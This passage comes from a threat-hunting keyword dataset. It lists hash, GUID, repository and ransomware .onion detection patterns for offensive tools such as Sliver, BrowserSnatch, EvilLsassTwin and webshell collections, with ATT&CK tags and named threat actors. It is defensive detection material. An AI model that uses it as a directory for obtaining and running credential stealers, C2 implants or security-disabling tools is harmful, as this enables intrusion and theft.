TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25244" 
"*3f8db721f5791fcaaef7d22b50a1cd6a87be8f07262c145ad66a18f832d75839*",".{0,1000}3f8db721f5791fcaaef7d22b50a1cd6a87be8f07262c145ad66a18f832d75839.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","25245" "*3f8db76e847878adee99ebbd0bb4399d65839f8eeb47506df23a1e10f2bd63b4*",".{0,1000}3f8db76e847878adee99ebbd0bb4399d65839f8eeb47506df23a1e10f2bd63b4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25246" "*3f9462dec07f9859ce437efe0a77ed335b07a47d2ce33b6bed3153aa3a1512d4*",".{0,1000}3f9462dec07f9859ce437efe0a77ed335b07a47d2ce33b6bed3153aa3a1512d4.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","25247" "*3f97c1116190ffd5984c92985bd12e0c92a044ca760cbb110ba9fe65a2703de4*",".{0,1000}3f97c1116190ffd5984c92985bd12e0c92a044ca760cbb110ba9fe65a2703de4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25249" "*3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689*",".{0,1000}3f9957546691a7b74cb1670cb39df0a00d0e6b8e55d6a049278ce97637b2e689.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25250" "*3fabdbc17823053cc58c6cea393a110a136a3d8687d61239b6f167db573ecc08*",".{0,1000}3fabdbc17823053cc58c6cea393a110a136a3d8687d61239b6f167db573ecc08.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25252" "*3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e*",".{0,1000}3fad659152d3559e2630e9e1a0e7d4c6770cfdd2e847ac6d438d852af77e591e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25253" "*3fb111c19e638174ed630c9a9d8d999c1bf62d2308a8284fedad1efab45a7f96*",".{0,1000}3fb111c19e638174ed630c9a9d8d999c1bf62d2308a8284fedad1efab45a7f96.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","25256" "*3FBBC3DD-39D9-4D8C-AF73-EDC3D2849DEB*",".{0,1000}3FBBC3DD\-39D9\-4D8C\-AF73\-EDC3D2849DEB.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","25258" "*3fbcc1db198e03bc5d6087c69e311fd97fe9861a7721526e9ea1d44e2398d022*",".{0,1000}3fbcc1db198e03bc5d6087c69e311fd97fe9861a7721526e9ea1d44e2398d022.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","25259" "*3fbde1d2887f69fa6f96aef04c2c7924e1a439cfadf44990620d0a2fb4a4db84*",".{0,1000}3fbde1d2887f69fa6f96aef04c2c7924e1a439cfadf44990620d0a2fb4a4db84.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - 
","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25260" "*3fc18c828c43a82a86b2aa19b1248d469fa882466818b85692bcb15c46369006*",".{0,1000}3fc18c828c43a82a86b2aa19b1248d469fa882466818b85692bcb15c46369006.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25261" "*3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647*",".{0,1000}3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25262" "*3FCA8012-3BAD-41E4-91F4-534AA9A44F96*",".{0,1000}3FCA8012\-3BAD\-41E4\-91F4\-534AA9A44F96.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25263" "*3fcec932530557ea3d1f38f06f477db4b0be5acb*",".{0,1000}3fcec932530557ea3d1f38f06f477db4b0be5acb.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 
- T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25264" "*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*",".{0,1000}3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25266" "*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*",".{0,1000}3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25267" "*3fd3c053edac4964627552e89cd2c46b31d0644d255986dfd3a4823ede742e06*",".{0,1000}3fd3c053edac4964627552e89cd2c46b31d0644d255986dfd3a4823ede742e06.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25268" "*3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf*",".{0,1000}3fe1b764b88336a034bff6db6532c2bc1e389680c54d38b32f2af8322ef1cfcf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25270" "*3gstudent.github.io/Windows-Event-Viewer-Log-*",".{0,1000}3gstudent\.github\.io\/Windows\-Event\-Viewer\-Log\-.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","1","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","25275" "*3gstudent/CLR-Injection*",".{0,1000}3gstudent\/CLR\-Injection.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","25276" 
"*3gstudent/COM-Object-hijacking*",".{0,1000}3gstudent\/COM\-Object\-hijacking.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","25277" "*3gstudent/Eventlogedit-evt--General*",".{0,1000}3gstudent\/Eventlogedit\-evt\-\-General.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","1","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","25278" "*3gstudent/Eventlogedit-evtx--Evolution*",".{0,1000}3gstudent\/Eventlogedit\-evtx\-\-Evolution.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","1","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","25279" "*3gstudent/Office-Persistence*",".{0,1000}3gstudent\/Office\-Persistence.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","25280" "*3gstudent/Smbtouch-Scanner*",".{0,1000}3gstudent\/Smbtouch\-Scanner.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral 
Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","25281" "*3gstudent/Waitfor-Persistence*",".{0,1000}3gstudent\/Waitfor\-Persistence.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","25282" "*3kom-superhack.txt*",".{0,1000}3kom\-superhack\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","25283" "*3ndG4me/AutoBlue-MS17-010*",".{0,1000}3ndG4me\/AutoBlue\-MS17\-010.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","25284" "*3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion*",".{0,1000}3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25285" "*3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd.onion*",".{0,1000}3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25286" 
"*3r7zqtidvujbmfhx52sb34u4vwkh66baefmqzlbqpcnwm3krzipy37yd.onion*",".{0,1000}3r7zqtidvujbmfhx52sb34u4vwkh66baefmqzlbqpcnwm3krzipy37yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25295" "*3snake-master*",".{0,1000}3snake\-master.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","25296" "*3wugtklp46ufx7dnr6j5cd6ate7wnvnivsyvwuni7hqcqt7hm5r72nid.onion*",".{0,1000}3wugtklp46ufx7dnr6j5cd6ate7wnvnivsyvwuni7hqcqt7hm5r72nid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25297" "*3x55o3u2b7cjs54eifja5m3ottxntlubhjzt6k6htp5nrocjmsxxh7ad.onion*",".{0,1000}3x55o3u2b7cjs54eifja5m3ottxntlubhjzt6k6htp5nrocjmsxxh7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25298" "*3xpl01tc0d3r/ProcessInjection*",".{0,1000}3xpl01tc0d3r\/ProcessInjection.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - 
T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","25299" "*3xploitGuy/pastehakk*",".{0,1000}3xploitGuy\/pastehakk.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","1","N/A","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","25300" "*3ytm3d25hfzvbylkxiwyqmpvzys5of7l4pbosm7ol7czlkplgukjq6yd.onion*",".{0,1000}3ytm3d25hfzvbylkxiwyqmpvzys5of7l4pbosm7ol7czlkplgukjq6yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25301" "*4.5.6.7:1337*",".{0,1000}4\.5\.6\.7\:1337.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","25302" "*40056/service-endpoint*",".{0,1000}40056\/service\-endpoint.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","25304" 
"*400b16a02c12bc59f8002db251638d4450c5736721904440bd1af274587b197c*",".{0,1000}400b16a02c12bc59f8002db251638d4450c5736721904440bd1af274587b197c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25305" "*401ab31450e32d265a189983c56a0f7f947b15fe3559c08773275f6c1e6625ce*",".{0,1000}401ab31450e32d265a189983c56a0f7f947b15fe3559c08773275f6c1e6625ce.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","25309" "*401e82b43a6ac88e204d178b6ffcb43dc33d13ce40b26739c5302030154469af*",".{0,1000}401e82b43a6ac88e204d178b6ffcb43dc33d13ce40b26739c5302030154469af.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25310" "*402e331588a371ded43b86c96e5d4424d59ad080094401b8c4fc87bb3b26905b*",".{0,1000}402e331588a371ded43b86c96e5d4424d59ad080094401b8c4fc87bb3b26905b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25312" 
"*402ea71c95ba45c95e58a17cf0903b78ddc4238afb79df1d9ab188d203b77d43*",".{0,1000}402ea71c95ba45c95e58a17cf0903b78ddc4238afb79df1d9ab188d203b77d43.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25313" "*40365cfc8131302172edbbf08c64f014f8dec760d487e8fe9bbf17141048a7c7*",".{0,1000}40365cfc8131302172edbbf08c64f014f8dec760d487e8fe9bbf17141048a7c7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25314" "*403b4508661f4fe6473ee1e56dce4ed39f563ab0cfcdd74c3d1eceb86cab62a1*",".{0,1000}403b4508661f4fe6473ee1e56dce4ed39f563ab0cfcdd74c3d1eceb86cab62a1.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25315" "*40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5*",".{0,1000}40408670ce1d814a3283a625566334fa191580622adbd23effa6e3cdaaafc5d5.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#filehash","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","25317" "*4045eef04cb934ac996942d0d51e80420b2ba985*",".{0,1000}4045eef04cb934ac996942d0d51e80420b2ba985.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","25319" "*404b35cd0c4124111995599f346050da72845a04fe5dacd53d8088692e4a3816*",".{0,1000}404b35cd0c4124111995599f346050da72845a04fe5dacd53d8088692e4a3816.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25320" "*404cf0d13d243deeeb2b94b9bf807164376a916377e537604a576e6036f84e9d*",".{0,1000}404cf0d13d243deeeb2b94b9bf807164376a916377e537604a576e6036f84e9d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25321" "*4059185741fed75ca2f3551cbcc522265ed3c63f15da6b12301a21668ff7c33d*",".{0,1000}4059185741fed75ca2f3551cbcc522265ed3c63f15da6b12301a21668ff7c33d.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25323" "*405cd1547ee19c39e0afa83ba8ac7a53a4f88c95447df355540d82a5aa74e484*",".{0,1000}405cd1547ee19c39e0afa83ba8ac7a53a4f88c95447df355540d82a5aa74e484.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","25324" 